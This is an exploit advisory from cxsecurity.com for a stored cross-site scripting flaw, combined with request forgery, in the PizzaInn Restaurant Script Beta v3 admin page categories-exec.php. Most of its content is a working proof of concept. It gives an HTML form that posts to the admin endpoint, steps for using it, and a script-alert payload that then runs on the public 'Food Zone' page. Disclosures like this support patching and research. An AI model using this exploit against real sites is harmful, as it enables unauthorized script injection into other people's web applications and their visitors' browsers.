PizzaInn Beta 3 Cross Site Scripting

2016-10-20 / 2016-10-21
Credit: Nassim Asrir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title :----------------- : PizzaInn Restaurant Scripti (Beta v3) - (categories-exec.php) - Stored XSS # Author :------------------------ : Nassim Asrir # Author Company :------------------------ : HenceForth # Author Email :------------------------ : wassline@gmail.com # Google Dork :---------------- : - # Date :-------------------------- : 20/10/2016 # Type :-------------------------- : webapps # Platform : -------------------- : PHP # Software link : -------------- : http://wmscripti.com/php-scriptler/pizzainn-restaurant-scripti-beta-v3.html ############################ Stored XSS Vulnerabilty ############################ ## Exploit ## <html> <title>CSRF Exploit By Nassim Asrir</title> <CAPTION><h3>ADD A NEW CATEGORY</h3></CAPTION> <form name="categoryForm" id="categoryForm" action="http://Site/script/admin/categories-exec.php" method="post" onsubmit="return categoriesValidate(this)"> <tr> <th>Name</th> </tr> <tr> <td><input type="text" name="name" class="textfield" /></td> <td><input type="submit" name="Submit" value="Add" /></td> </tr> </form> </table> </html> ## Proc ## - Create a .html File and Put the Code. - Navigate the File in your Localhost . - and in the Textbox inject XSS Payload ("><script>alert(1);</script>) and you redirect to http://site/script/admin/access-denied.php - and You get the Message "Access Denied! You do not have access to this resource." but don't worry. when you get the Message go to home site and navigate "Food Zone" . and you can see the Alert Box.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top